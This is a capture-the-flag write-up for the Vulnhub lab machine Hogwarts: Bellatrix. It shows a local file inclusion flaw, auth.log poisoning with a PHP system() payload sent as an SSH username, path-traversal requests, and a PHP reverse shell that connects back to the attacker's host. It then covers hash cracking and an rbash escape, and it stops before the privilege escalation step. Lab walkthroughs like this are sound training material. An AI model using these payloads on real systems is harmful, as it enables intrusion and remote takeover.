Vulnhub - HOGWARTS: BELLATRIX
The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic
This works better in VirtualBox
Hints –> Brute force is not necessary, unless it is required. ncat is the key ;)
This is HOGWARTS: BELLATRIX from Vulnhub.
SSH and HTTP only.
On the front page of the website we get a long string of text repeating the phrase ikilledsiriusblack 44 times (I think) and finally ending with .php. In the page source we get the following hints:
Nah … this time there are no clues in the source code …
o yeah, maybe I’ve already told you a directory .php? :)
$file = $_GET[‘file’];
In case it’s not obvious: the PHP code provides an LFI vulnerability, and the hint about ncat in the description suggests log poisoning. Let’s dig in.
The hints made it relatively obvious, but the LFI was here:
With /etc/passwd I could see we had two users, lestrange and bellatrix. I haven’t read (or watched) Harry Potter so I don’t know if these two are related or something. My daughter is reading it now, maybe she can tell me. I could read the apache configuration files, but even though I knew where the log files were I couldn’t read them. So how to do the log poisoning?
You can do auth.log poisoning with an attempted SSH login:
root@kali:/opt/vulnhub/bellatrix# ssh "<?php system($_GET['cmd']); ?>"@192.168.1.158
And I could read /var/log/auth.log; so this was the way in. When I read auth.log with the LFI I couldn’t see my PHP code above where I thought it should be, but I sent a few commands with Burp Suite repeater and it was definitely responding, eg:
GET /ikilledsiriusblack.php?file=../../../../../../../../../../../var/log/auth.log&cmd=pwd HTTP/1.1
This was my shell command:
GET /ikilledsiriusblack.php?file=../../../../../../../../../../../var/log/auth.log&cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
And I was in.
On the box
In /var/www/html we find ‘c2VjcmV0cw==’. Uh … what?
Oh, okay then. In there we have:
That’s a list of possible password (.secret.dic) and a hash (Swordofgryffindor):
I’ll give them both to John:
Now we can SSH in as lestrange.
Lestrange has rbash as his login shell, which makes life difficult. We can escape it though:
root@kali:/opt/vulnhub/bellatrix# ssh lestrange@bellatrix -t "bash --noprofile"
Once we’ve done that, we find out lestrange can use vim as anyone, and that’s our privesc per GTFOBins: